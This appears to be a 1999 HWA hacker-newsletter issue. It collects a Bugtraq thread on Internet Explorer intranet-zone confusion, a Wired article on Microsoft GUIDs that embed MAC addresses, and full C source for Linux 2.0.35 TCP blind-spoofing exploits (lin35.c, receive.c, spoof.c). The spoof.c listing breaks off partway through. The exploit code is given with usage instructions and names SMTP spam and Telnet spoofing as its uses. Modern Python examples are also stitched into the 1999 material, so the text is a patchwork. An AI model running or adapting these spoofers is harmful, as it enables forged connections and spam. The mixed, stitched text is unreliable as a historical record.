...dave
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 00:18:10 -0800
From: Walt Armour <walt@BLARG.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
I would agree that these are still issues but there is a difference
between them and the original problem.
With the original problem any site could redirect you to a site and make
it look like Local Intranet simply by using the 'http://031713501415/'
format.
With these two new issues someone must have direct knowledge about your
machine's configuration or have direct access to your machine in order to
make a not-quite-too-common configuration change. If either of these
situations occurs then the safety level of my browser will quickly become
the least of my worries. :)
IMO Microsoft is right in saying that the problems are (marginally)
different. Whether or not their method for determining "local intranet"
is right is a completely different subject.
walt
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 11:07:19 -0600
From: iversen <signal11@MEDIAONE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
Oliver Lineham wrote:
> - New TLDs. Internic goes and adds a .web or .store or something that
> didn't exist when the browser was released. I'm sure all the e-commerce
> sites on .store would love their servers being considered "Local Intranet
> Sites"!
>
> If this is how the zones are implemented, then it's insane. If not, then
> IE's claim of being able to distinguish intranet sites from internet ones
> is an outright lie and the "feature" should be removed.
This seems to be trivial to resolve - put everything in the internet zone
unless it matches a list containing the local intranets. Then do reverse-dns
of everything that's allegedly inside the intranet and make sure everything
matches up. It isn't a perfect solution, but it would make it substantially
harder to fake a remote site as local. You also get the added benefit of
not needing to worry about how IE resolves domains/ip addresses.
--
signal11@mediaone.net | BOFH, Malign networks
I'll give you the TCO of Linux as soon as my
calculator stops saying "divide by zero error."
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 14:17:43 -0500
From: Jim Paris <jim@JTAN.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
> The difference between MS98-016 and your examples is simple. The bulletin
> addressed an issue where an external site could, without your control, fool
> your browser into thinking a remote site was "local intranet".
And this can occur with my examples as well. I didn't control it at
all.
> In your
> examples, the user must choose specific settings to allow the problem to
> occur. If you are concerned about the problem, simply remove .com, etc.
> from your DNS suffix search, and don't put nasty hosts in your hosts file.
Just because I added a DNS suffix search order and put hosts into my
hosts file does not (or, at least, SHOULD not) mean that I am choosing
"specific settings to allow the problem to occur". How was I supposed
to know that simplifying my life by adding a search suffix of ".com" was
opening me up to a vulnerability?
> In the end, this is not a "bug" in the browser - it's a configuration
> problem. While worthy of mention, it does not deserve flamage.
No, this is a bug in the browser. Changing something over at point A
shouldn't affect my security at point B.
-jim
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 11:58:55 -0800
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
> -----Original Message-----
> From: Oliver Lineham [mailto:oliver@LINEHAM.CO.NZ]
> Sent: Monday, March 08, 1999 2:37 AM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: Re: More Internet Explorer zone confusion
>
>
> At 21:53 5/03/99 -0500, you wrote:
>
> Yech.
>
> >That means that IE has to rely on the URL. By convention, an URL that does
> >not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
> >internal site. I'm told that this is how all web browsers make the
> >distinction. You have to make specific reconfigurations to allow the
> >dotless URLs to resolve externally. Thanks,
>
> This is insane - and most probably not how it distinguishes
> domains at all.
That's correct.
I believe that the rule for Intranet zone is simple -- if the name has no
"." and is less than 15 characters long, then it's Intranet zone. This
algorithm works with the default configuration of Windows. If you configure
your machine so that the above assumption is violated, then you'll get a
mis-classification.
When designing better ways of doing this, keep in mind that the primary tool
that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
return enough information about how the name was resolved to be helpful for
security purposes (even though it garnered some in the process of
resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
used to resolve the name, or which DNS search suffix was used.
Paul
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 19:49:32 -0600
From: Jeremie <jer@JEREMIE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion (new issue)
> The assumptions may indeed be flawed, but I don't understand how your
> observations below demonstrate that.
The assumption:
[if the name has no "." and is less than 15 characters long, then it's
Intranet zone]
Simply:
The name "ls" has no "." and is less than 15 characters, and yet it is a
valid *Internet* host and should *not* be qualified as "Intranet Zone".
Jeremie
jer@jeremie.com
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 01:59:08 -0500
From: Christopher Masto <chris@NETMONGER.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
Is this intranet zone thing _really_ of any value? Why is there a
built-in default assumption that something from a "local" server is
more trustworthy? Consider the following situations:
1. A customer of your ISP, netmonger.net, is evil. They have a page
that links or redirects to http://www/~evil/evil.html, taking
advantage of the fact that your machine is configured with your
ISP's domain in the search list.
2. You go to school at RPI. You have a dorm ethernet connection.
Your machine is naive.dorm.rpi.edu, and you have dorm.rpi.edu
in your domain search list. An evil person gets evil.dorm.rpi.edu,
and you know the rest.
3. You work at Giganticorp and have access to high-level trade secrets.
Giganticorp has an intranet where employees can put up their own
web pages. An evil employee takes advantage of the default security
settings to gain access to your secrets, which he sells to the
competition.
Numbers 1 and 2 ask the question, "Why are we assuming that a
non-qualified host name implies intranet implies trust?" Number 3
asks the question, "Why are we assuming that intranet implies trust?"
Another question is "How many people who use IE have no intranet?"
Considering that there are a quantity of tools available to deploy
IE at your company with preconfigured settings, why not default to
not having this intranet zone. If Giganticorp needs to turn down
the security, they can do so at the same time they're customizing
the rest of the settings.
I don't personally use Microsoft products, and I am not quite familiar
with the specific security precautions that are disabled for the
intranet zone, but if they're enough to cause concern on the Internet,
the same problems can occur even when the browser isn't malfunctioning
at all.
--
Christopher Masto Director of Operations NetMonger Communications
chris@netmonger.net info@netmonger.net http://www.netmonger.net
Free yourself, free your machine, free the daemon -- http://www.freebsd.org/
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 08:58:43 +0100
From: Tilman Schmidt <Tilman.Schmidt@SEMA.DE>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
At 11:07 08.03.99 -0600, iversen wrote:
>Oliver Lineham wrote:
>> If this is how the zones are implemented, then it's insane. If not, then
>> IE's claim of being able to distinguish intranet sites from internet ones
>> is an outright lie and the "feature" should be removed.
>
>This seems to be trivial to resolve - put everything in the internet zone
>unless it matches a list containing the local intranets. Then do reverse-dns
>of everything that's allegedly inside the intranet and make sure everything
>matches up.
This is of course the correct way to implement an "intranet zone".
It has, however, one serious drawback: you have to configure it.
Consumer product manufacturers like Microsoft want their product
to work as much "out of the box" as possible.
However, IMHO there is no way to implement the concept of "intranet
zone" reliably without actually telling the browser the exact extent
of your intranet one way or other. Heuristics like "if there is no
dot in the hostname then let's assume it is in the intranet" just
aren't reliable enough to base a security mechanism on.
At Mon, 8 Mar 1999 11:58:55 -0800, Paul Leach wrote:
>I believe that the rule for Intranet zone is simple -- if the name has no
>"." and is less than 15 characters long, then it's Intranet zone. This
>algorithm works with the default configuration of Windows. If you configure
>your machine so that the above assumption is violated, then you'll get a
>mis-classification.
It doesn't even work with the default configuration of Windows,
because the basic assumption that every host with an FQDN in the
same DNS domain as the client is also in the intranet zone is
flawed. There are perfectly legitimate configurations where this
is not the case.
>When designing better ways of doing this, keep in mind that the primary tool
>that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
>return enough information about how the name was resolved to be helpful for
>security purposes (even though it garnered some in the process of
>resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
>used to resolve the name, or which DNS search suffix was used.
It is irrelevant how the name was resolved. You need a mechanism
to specify the intended scope of your intranet unambiguously,
instead of relying on some unspoken assumption like "for our
purposes, 'intranet zone' will be taken to mean all hosts which
happen to have at least one FQDN in the same domain as the
client".
--
Tilman Schmidt E-Mail: Tilman.Schmidt@sema.de (office)
Sema Group Koeln, Germany tilman@schmidt.bn.uunet.de (private)
"newfs leaves the filesystem in a well known state (empty)."
- Henrik Nordstrom
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 17:15:07 -0500
From: Jim Frost <jimf@FROSTBYTES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
|This is of course the correct way to implement an "intranet zone".
|It has, however, one serious drawback: you have to configure it.
|Consumer product manufacturers like Microsoft want their product
|to work as much "out of the box" as possible.
Since there is no intranet for most consumers this seems like largely a
non-issue. Those with intranets in their home probably know enough to
configure it properly. And businesses should have IT departments whose job it
is to manage it.
So what's the problem?
|It doesn't even work with the default configuration of Windows,
|because the basic assumption that every host with an FQDN in the
|same DNS domain as the client is also in the intranet zone is
|flawed. There are perfectly legitimate configurations where this
|is not the case.
Not only legitimate, but increasingly common. Cable modem customers, for
instance, tend to have their entire region in the same "intranet": eg
customer.ne.mediaone.net. I assure you that you don't want to treat the entire
northeast region of MediaOne customers as trusted in any way, shape, or form.
jim
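The two approaches argued over in this thread, as an added example (not code from any poster in it): the dotless/short-name heuristic Paul Leach describes, the same-DNS-domain assumption Tilman Schmidt and Jim Frost object to, and the explicit-list classifier with forward/reverse DNS agreement that iversen and Tilman propose, with dave's designated local ranges added. The resolver tables, search suffixes, host names and addresses are constructed stand-ins for gethostbyname and reverse DNS.

```python
"""Browser zone classification three ways: dotless-name heuristic, same-domain
assumption, and explicit intranet list with forward/reverse DNS agreement."""
import ipaddress
from typing import Dict, Optional, Set, Tuple

# Constructed resolver data standing in for gethostbyname and reverse DNS.
# The client's search list holds its own company domain and its ISP's domain.
CLIENT_DOMAIN = "corp.example"
SEARCH_SUFFIXES = [CLIENT_DOMAIN, "netmonger.net"]
FORWARD: Dict[str, str] = {
    "ls": "192.0.2.10",                     # a bare one-label Internet host
    "www.netmonger.net": "198.51.100.7",    # ISP customer page, reached as "www"
    "intraweb.corp.example": "10.1.2.3",    # a genuine intranet server
    "evil.corp.example": "203.0.113.9",     # same DNS domain, but not the intranet
    "hijacked.corp.example": "10.9.9.9",    # listed as intranet, but points elsewhere
}
REVERSE: Dict[str, str] = {
    "192.0.2.10": "ls",
    "198.51.100.7": "www.netmonger.net",
    "10.1.2.3": "intraweb.corp.example",
    "203.0.113.9": "evil.corp.example",
    "10.9.9.9": "other.corp.example",       # does not map back to hijacked.corp.example
}
# The explicit intranet configuration Tilman asks for, plus dave's local ranges.
INTRANET_HOSTS: Set[str] = {"intraweb.corp.example", "hijacked.corp.example"}
LOCAL_NETS = [ipaddress.ip_network(n)
              for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def resolve(name: str) -> Optional[Tuple[str, str]]:
    """Emulate gethostbyname with a search list: return (name actually
    resolved, address) or None. The caller never learns which suffix was
    appended, which is the information Paul Leach notes is missing."""
    if name in FORWARD:
        return name, FORWARD[name]
    if "." not in name:
        for suffix in SEARCH_SUFFIXES:
            fqdn = f"{name}.{suffix}"
            if fqdn in FORWARD:
                return fqdn, FORWARD[fqdn]
    return None


def heuristic_zone(name: str) -> str:
    """The rule described in the thread: no dot and under 15 characters
    means Intranet zone. Nothing about how the name resolves is consulted."""
    return "intranet" if "." not in name and len(name) < 15 else "internet"


def same_domain_zone(name: str) -> str:
    """The other assumption criticised: any host whose FQDN shares the
    client's DNS domain is treated as intranet."""
    hit = resolve(name)
    fqdn = hit[0] if hit else name
    return "intranet" if fqdn.endswith("." + CLIENT_DOMAIN) else "internet"


def strict_zone(name: str, intranet_hosts: Set[str] = INTRANET_HOSTS) -> str:
    """Internet unless the resolved name is explicitly configured as intranet,
    its address maps back to that same name, and it lies in a local range."""
    hit = resolve(name)
    if hit is None:
        return "internet"
    fqdn, addr = hit
    if fqdn not in intranet_hosts:
        return "internet"
    if REVERSE.get(addr) != fqdn:           # forward and reverse must agree
        return "internet"
    ip = ipaddress.ip_address(addr)
    if not any(ip in net for net in LOCAL_NETS):
        return "internet"
    return "intranet"


def compare(names=("ls", "www", "intraweb", "evil.corp.example", "hijacked")
            ) -> Dict[str, Tuple[str, str, str]]:
    """Zone each name under all three rules: {name: (heuristic, same_domain, strict)}."""
    return {n: (heuristic_zone(n), same_domain_zone(n), strict_zone(n)) for n in names}


if __name__ == "__main__":
    for n, (h, d, s) in compare().items():
        print(f"{n:20} heuristic={h:9} same-domain={d:9} strict={s}")
```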
@HWA
04.6 Sniffing out MS Security Glitch the GUID (and how to defeat it?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"If Microsoft starts compelling people to
register, then it's going to take a lot of
time for people to disentangle their lives
from Microsoft's sticky tentacles."
From Wired/ZDNET
http://www.wired.com/news/news/technology/story/18331.html
Sniffing Out MS Security Glitch
by Chris Oakes
5:30 p.m. 8.Mar.99.PST
A security vulnerability that hides unique identifiers in Microsoft
Office documents may affect files created by other software
applications, according to the programmer who identified the breach.
Other Office documents and browser cookies, and possibly even software
from other companies, can store the unique identity codes, according to
Richard Smith, president of Phar Lap Software in Cambridge, Massachusetts,
who first reported the security glitch on Sunday.
Smith discovered that Excel and Word applications fingerprint files with
an identifying number. That number is used by the hardware that connects
a PC to a local area network. The 32-digit numbers were designed long
ago by developers of networking hardware to identify individual machines.
"These things are slippery. These [numbers] are floating around -- it's
hard to say where they're showing up," said Smith. Microsoft was not
available for comment. The identifying number is trapped in the Windows
registry file as a Globally Unique Identifier, or GUID, and embedded in a
hidden part of documents created using Office, including Word, Excel, and
PowerPoint.
"I got email for someone mentioning that GUIDs are also put in Web-browser
cookies. I did a quick scan on my Netscape cookies file and found a number
of Web sites that were indeed using GUIDs for identification purposes,"
Smith said. It goes to show the ubiquity of the ID numbers, he said.
"Anyone writing applications can use them. [The privacy issue] is an
unintended side effect." The unique number can be easily traced to a person
by searching for the number in documents known to be created by that person,
according to Smith.
Unknown documents could also be associated with that person using the
identification number. "If you're in some really weird office-politics
situation -- who knows?" he said. He plans to explore whether other
Windows applications, such as software for creating Web pages, use the ID
numbers. He's also interested in the behavior of the company's Outlook email
software.
Smith said users can easily find their own network address, then search their
hard-disk content for documents containing the ID number to determine
where it is surreptitiously stored. Users can find the number by selecting
the Run command under the Windows Start menu and typing winipcfg to launch
the Windows IP configuration utility. One of the fields appearing in the
dialog box contains the user's "network adapter" address.
"All I did was have a search utility scan the hard disk for occurrences of
the Ethernet address," he said. Smith used one called Grep. "Anyone can do
that and see how common it is."
Certain types of text editors, known as hexadecimal editors, will reveal the
invisible code in any file. One example of the editor is HexEdit. Smith made
a related discovery when he found Microsoft was collecting the identification
number users entered when registering their new copies of the company's
Windows 98 operating system, prompting Microsoft to post an open letter to
its customers.
It said the company would publish software to remove the ID number from users'
Windows registry file, a move designed to prevent the behavior from occurring
in future documents. The company also said a subsequent update of Windows 98
would disable the software's registration feature so that the hardware ID would
not be collected "unless the user checks the option to send hardware information
to Microsoft." The company said it also plans to post a software tool on its Web
site that will allow users to delete hardware-registration information from
the Windows registry. But in a privacy advisory also issued Monday, a
privacy-watchdog group demanded that Microsoft go further.
"What I think is unprecedented here is that the problem is now on billions of
documents around the world. The problem remains out there even if Microsoft
fixed the applications," said Jason Catlett, president of Junkbusters.
"We demand they publish and publicize free software to protect these files --
and that's not something Microsoft in its open letter said it would do.
"[Users] really don't have an effective means of stopping [the problem] from
happening short of switching to [another software product like] Corel
WordPerfect," he said. Smith and privacy advocates worry that Microsoft
already has built up a database of registration numbers, although the company
said it plans to purge its own databases of any hardware-identification
information that may have been inadvertently gathered without customers'
consent.
Microsoft said it was confident "that the hardware information is not being
stored in our marketing databases, and we are investigating whether it is
stored in any database at all within Microsoft." Catlett believes an
independent auditor should oversee any such effort to purge the data, which
could have been transferred to backup systems or related databases.
"For me, the bottom line is Microsoft is getting information off of people's
computer [that] they have no business getting." Addressing that issue, he
said, "sounds like a patch to me." Catlett is disturbed by this wide-reaching
impact. Combined with Microsoft's push for required registration, a possibility
Catlett documented last week, he sees a quagmire for users trying to protect
themselves.
"If Microsoft starts compelling people to register, then its going to take a
lot of time for people to disentangle their lives from Microsoft's sticky
tentacles."
And From HNN March 12th:
contributed by spitfire
Are you worried about the Microsoft Global Unique Identifier? You know, that
number that is based on your MAC address, is embedded in all your documents
and is transmitted to Redmond whenever you visit the Microsoft web site or
register a product? Well Vector Development claims to have the solution,
Guideon.
Guideon claims to replace the GUID string with zeros or an optional string
you choose. <sounds interesting, I could think of some choice strings,
to replace the GUID with ... *grin* -Ed >
Vector Development http://www.vecdev.com/guideon.html
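The audit Smith describes, applied to a single document instead of a whole disk, as an added example (not code from the article, from Richard Smith, or from Vector Development): find time-based GUIDs whose node field equals the adapter address winipcfg shows, then zero that field the way Guideon is said to. It assumes the GUID appears in its textual hex form and uses the DCE/RFC 4122 version-1 layout, where the version sits in the third group and the last 12 hex digits are the node (the MAC for hardware-derived GUIDs, with the multicast bit set when the node was random instead); the document bytes and adapter address are constructed.

```python
"""Find and scrub time-based GUIDs that carry a network adapter address."""
import re
from typing import List, NamedTuple

# Textual GUID: 8-4-4-4-12 hex digits, with or without surrounding braces.
GUID_RE = re.compile(
    rb"([0-9A-Fa-f]{8})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{4})-"
    rb"([0-9A-Fa-f]{4})-([0-9A-Fa-f]{12})"
)
NODE_OFFSET = 24   # "xxxxxxxx-xxxx-xxxx-xxxx-" is 24 characters before the node field


class GuidHit(NamedTuple):
    offset: int          # byte offset of the GUID text in the blob
    guid: str            # upper-case, dash-separated form
    version: int         # high nibble of the third group (1 = time-based)
    node: str            # last 48 bits as 12 hex digits
    hardware_node: bool  # time-based and multicast bit clear: a real MAC


# Constructed sample: an OLE-style header marker, a property named _PID_GUID
# holding a version-1 GUID built from the adapter address, and an unrelated
# random (version-4) GUID whose node field is not a MAC.
SAMPLE_MAC = "00-60-97-AB-CD-EF"      # constructed adapter address, winipcfg style
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0constructed-header\x00\x00"
    b"_PID_GUID\x00{3C2B4A10-D9E1-11D2-8F6A-006097ABCDEF}\x00"
    b"some body text\x00"
    b"{9E107D9D-372B-4E1C-9A77-01CAFEBABE01}\x00"
)


def mac_hex(mac: str) -> str:
    """Normalise '00-60-97-ab-cd-ef' or '00:60:97:AB:CD:EF' to '006097ABCDEF'."""
    return re.sub(r"[^0-9A-Fa-f]", "", mac).upper()


def find_guids(blob: bytes) -> List[GuidHit]:
    """Every textual GUID in the blob, with its version and node decoded."""
    hits = []
    for m in GUID_RE.finditer(blob):
        groups = [g.decode("ascii").upper() for g in m.groups()]
        version = int(groups[2][0], 16)
        node = groups[4]
        # RFC 4122: random node IDs have the multicast bit (LSB of first octet) set.
        hardware = version == 1 and (int(node[:2], 16) & 0x01) == 0
        hits.append(GuidHit(m.start(), "-".join(groups), version, node, hardware))
    return hits


def leaks_mac(blob: bytes, mac: str) -> List[GuidHit]:
    """GUIDs in the blob whose hardware node equals the given adapter address."""
    want = mac_hex(mac)
    return [h for h in find_guids(blob) if h.hardware_node and h.node == want]


def scrub_node(blob: bytes, mac: str) -> bytes:
    """Overwrite the node field of each matching GUID with zeros, in place.
    The length is unchanged, so no other offsets in the document move."""
    out = bytearray(blob)
    for h in leaks_mac(blob, mac):
        start = h.offset + NODE_OFFSET
        out[start:start + 12] = b"0" * 12
    return bytes(out)


if __name__ == "__main__":
    for h in find_guids(SAMPLE_DOC):
        print(f"@{h.offset:4} {h.guid} v{h.version} node={h.node} mac={h.hardware_node}")
    print("leaks adapter address:", [h.guid for h in leaks_mac(SAMPLE_DOC, SAMPLE_MAC)])
    print("after scrub:", [h.guid for h in find_guids(scrub_node(SAMPLE_DOC, SAMPLE_MAC))])
```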
@HWA
05.0 Linux TCP flaw exploit code for Linux 2.0.35 and older.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* linux 2.0.35 and older
 * tcp flaw exploit (discovered by network associates, october 1998)
 * by scut (990310)
 *
 * description: linux does send the tcp data received in the SYN_RECEIVED
 *              state if a FIN packet is sent
 * affect:      blind spoofing on linux systems with kernel version below 2.0.35
 * useful for:  SMTP spoofing (for the lamers to spam)
 *              FTP/Telnet spoofing
 * for the lamers: no, you cannot spoof your mIRC with this
 *
 * for compilation you need libnet, a low level network library from route,
 * go to http://www.infonexus.com/~daemon9/
 * then try with:
 *
 * gcc -o lin35 lin35.c -lnet -D_BSD_SOURCE=1
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>          /* O_RDONLY */
#include <sys/types.h>
#include <sys/time.h>
#include <libnet.h>         /* libnet 0.x API: name_resolve, build_ip, build_tcp, ... */

int
main(int argc, char **argv)
{
    u_long dip = 0;         /* destination address */
    u_long sip = 0;         /* (spoofed) source address */
    u_short dp = 0;         /* destination port */
    u_short sp = 0;         /* source port */
    u_long seq;             /* our initial sequence number */
    u_char *buf, *fbuf;     /* packet buffer, data file contents */
    int c, s, fp;
    off_t fs;               /* size of the data file */

    printf("lin35 - linux < 2.0.35 spoofer by sc!\n");
    if (argc != 7) {
        printf("usage: %s shost sport dhost dport delay file\n", argv[0]);
        printf("  shost = source host (name or ip)\n");
        printf("  sport = source port\n");
        printf("  dhost = destination host\n");
        printf("  dport = destination port\n");
        printf("  delay = time to wait (in ms) between SYN and data and FIN\n");
        printf("  file  = filename to read data from\n");
        exit(0);
    }

    sip = name_resolve(argv[1], 1);
    sp = atoi(argv[2]);
    dip = name_resolve(argv[3], 1);
    dp = atoi(argv[4]);

    /* load the payload file into memory */
    fp = open(argv[6], O_RDONLY);
    if (fp == -1) {
        fprintf(stderr, "file not found\n");
        exit(1);
    }
    fs = lseek(fp, 0, SEEK_END);
    if (fs == -1) {
        fprintf(stderr, "file end not found\n");
        exit(1);
    }
    if (lseek(fp, 0, SEEK_SET) == -1) {
        fprintf(stderr, "cannot reset offset\n");
        exit(1);
    }
    printf("[35] data file: %s - file size: %ld\n", argv[6], (long)fs);
    if (fs > (MAX_PACKET - (IP_H + TCP_H))) {
        fprintf(stderr, "file too big, exiting\n");
        exit(1);
    }
    fbuf = malloc(fs);
    if (fbuf == NULL) {
        fprintf(stderr, "cannot load file to mem\n");
        exit(1);
    }
    c = read(fp, fbuf, fs);
    if (c != fs) {
        fprintf(stderr, "cannot read file\n");
        exit(1);
    }
    close(fp);

    buf = calloc(1, TCP_H + IP_H);
    if (buf == NULL) {
        fprintf(stderr, "no memory for packet\n");
        exit(1);
    }
    s = open_raw_sock(IPPROTO_RAW);
    if (s == -1) {
        fprintf(stderr, "cannot open raw socket\n");
        exit(1);
    }
    seq = get_prand(PRu32);

    /* first initiate a connection */
    printf("[35] opening connection, sending SYN\n");
    build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
             sip, dip, NULL, 0, buf);
    build_tcp(sp, dp, seq, 0, TH_SYN, 16384, 0, NULL, 0, buf + IP_H);
    do_checksum(buf, IPPROTO_TCP, TCP_H);
    c = write_ip(s, buf, TCP_H + IP_H);
    if (c < TCP_H + IP_H) {
        fprintf(stderr, "sent too few bytes\n");
        exit(1);
    }

    /* now wait to let the connection establish */
    usleep(atoi(argv[5]) * 1000);

    /* then send data packet (no flags at all) */
    printf("[35] sending data packet (%ld bytes of data)\n", (long)fs);
    buf = realloc(buf, TCP_H + IP_H + fs);
    if (buf == NULL) {
        fprintf(stderr, "memory\n");
        exit(1);
    }
    build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
             sip, dip, NULL, 0, buf);
    build_tcp(sp, dp, seq + 1, 0, 0, 16384, 0, fbuf, fs, buf + IP_H);
    do_checksum(buf, IPPROTO_TCP, TCP_H);
    c = write_ip(s, buf, TCP_H + IP_H + fs);
    if (c < (TCP_H + IP_H + fs)) {
        fprintf(stderr, "sent too few bytes (%d) for data packet\n", c);
        exit(1);
    }

    /* now wait again */
    usleep(atoi(argv[5]) * 1000);

    /* and close the connection */
    printf("[35] closing connection, sending FIN\n");
    build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
             sip, dip, NULL, 0, buf);
    build_tcp(sp, dp, seq + 1 + fs, 0, TH_FIN, 16384, 0, NULL, 0, buf + IP_H);
    do_checksum(buf, IPPROTO_TCP, TCP_H);
    c = write_ip(s, buf, TCP_H + IP_H);
    if (c < TCP_H + IP_H) {
        fprintf(stderr, "sent too few bytes\n");
        exit(1);
    }
    printf("[35] successful\n");

    free(fbuf);
    free(buf);
    return (0);
}
@HWA
05.1 TCP Blind Spoofing Exploit Code for Linux kernels 2.0.35< and Discussion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=- receive.c and spoof.c exploit code
Hello,
Here is some demonstration code for the "Linux Blind TCP Spoofing" problem
discovered by Network Associates, Inc. If you have trouble compiling this,
try it with -D_BSD_SOURCE.
1.) receive.c
This simple program creates a TCP socket and waits for a connection.
After the accept call returns, it reads 8 bytes from the socket and
prints them on stdout.
usage: receive listen_port
2.) spoof.c
This one sends a SYN packet, a Null packet (no flags at all) with 8 bytes
of data and a FIN packet to the target.
usage: spoof source_ip source_port target_ip target_port
Don't forget to disable host source_ip so it cannot send RST's. I've tested
this on Linux 2.0.30. After the FIN packet is received, the accept call
returns and the read call gives the data sent with the Null packet.
!!This code is for educational purposes only!!
---------------------------- receive.c --------------------------
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>

int
main(int argc, char *argv[])
{
    int i, n, new;
    socklen_t dummy;
    struct sockaddr_in address, source_addr;
    char buffer[9];                     /* 8 bytes of data plus a terminating NUL */

    if (argc != 2) {
        fprintf(stderr, "usage: %s listen_port\n", argv[0]);
        exit(1);
    }
    memset(&address, 0, sizeof(address));
    address.sin_family = AF_INET;
    address.sin_port = htons(atoi(argv[1]));
    address.sin_addr.s_addr = 0;        /* INADDR_ANY */
    if ((i = socket(AF_INET, SOCK_STREAM, 6)) < 0) {    /* create socket, protocol 6 = TCP */
        perror("socket");
        exit(1);
    }
    if ((bind(i, (struct sockaddr *)&address, sizeof(struct sockaddr_in))) < 0) {
        perror("bind");                 /* bind socket to address */
        exit(1);
    }
    if ((listen(i, 2)) < 0) {
        perror("listen");
        exit(1);
    }
    printf("listening on socket\n");
    dummy = sizeof(source_addr);
    new = accept(i, (struct sockaddr *)&source_addr, &dummy);
    if (new > 0)
        printf("connected!\n");
    else {
        perror("accept");
        exit(1);
    }
    fflush(stdout);
    n = read(new, buffer, 8);
    if (n < 0) {
        perror("read");
        exit(1);
    }
    buffer[n] = '\0';                   /* make it printable with %s */
    printf("read %i bytes from socket\n", n);
    printf("message is: %s\n", buffer);
    close(new);
    close(i);
    return 0;
}
--------------------------------spoof.c---------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>         /* memcpy */
#include <unistd.h>         /* usleep, close */
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>    /* BSD-style th_* field names: compile with -D_BSD_SOURCE */
#include <arpa/inet.h>
#include <asm/types.h>

#define FIN 1
#define SYN 2
#define SEQ 20985

/*---------------Checksum calculation--------------------------------*/
unsigned short in_cksum(unsigned short *addr, int len)
{
    register int nleft = len;
    register unsigned short *w = addr;
    register int sum = 0;
    unsigned short answer = 0;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    if (nleft == 1) {                   /* odd trailing byte */
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff); /* fold the carries */
    sum += (sum >> 16);
    answer = ~sum;
    return (answer);
}
/*----------------------------------------------------------------------*/

/*------------Send spoofed TCP packet-----------------------------------*/
int send_tcp(int sfd, unsigned int src, unsigned short src_p,
             unsigned int dst, unsigned short dst_p, tcp_seq seq, tcp_seq ack,
             u_char flags, char *buffer, int len)
{
    struct iphdr ip_head;
    struct tcphdr tcp_head;
    struct sockaddr_in target;
    char packet[2048];      /* the exploitation of this is left as an exercise.. */
    int i;
    struct tcp_pseudo {     /* the tcp pseudo header */
        __u32 src_addr;
        __u32 dst_addr;
        __u8 dummy;
        __u8 proto;
        __u16 length;
    } pseudohead;
    struct help_checksum {  /* struct for checksum calculation */
        struct tcp_pseudo pshd;
        struct tcphdr tcphd;
        char tcpdata[1024];
    } tcp_chk_construct;

    if (len < 0 || len > (int)sizeof(tcp_chk_construct.tcpdata))
        return (-1);        /* keep tcpdata[] and packet[] in bounds */

    /*Prepare IP header*/
    ip_head.ihl = 5;        /* header length with no options */
    ip_head.version = 4;
    ip_head.tos = 0;
    ip_head.tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + len);
    ip_head.id = htons(31337 + (rand() % 100));
    ip_head.frag_off = 0;
    ip_head.ttl = 255;
    ip_head.protocol = IPPROTO_TCP;
    ip_head.check = 0;      /* fill in later */
    ip_head.saddr = src;
    ip_head.daddr = dst;
    ip_head.check = in_cksum((unsigned short *)&ip_head, sizeof(struct iphdr));

    /*Prepare TCP header*/
    tcp_head.th_sport = htons(src_p);
    tcp_head.th_dport = htons(dst_p);
    tcp_head.th_seq = htonl(seq);
    tcp_head.th_ack = htonl(ack);
    tcp_head.th_x2 = 0;
    tcp_head.th_off = 5;
    tcp_head.th_flags = flags;
    tcp_head.th_win = htons(0x7c00);
    tcp_head.th_sum = 0;    /* fill in later */
    tcp_head.th_urp = 0;

    /*Assemble structure for checksum calculation and calculate checksum*/
    pseudohead.src_addr = ip_head.saddr;
    pseudohead.dst_addr = ip_head.daddr;
    pseudohead.dummy = 0;
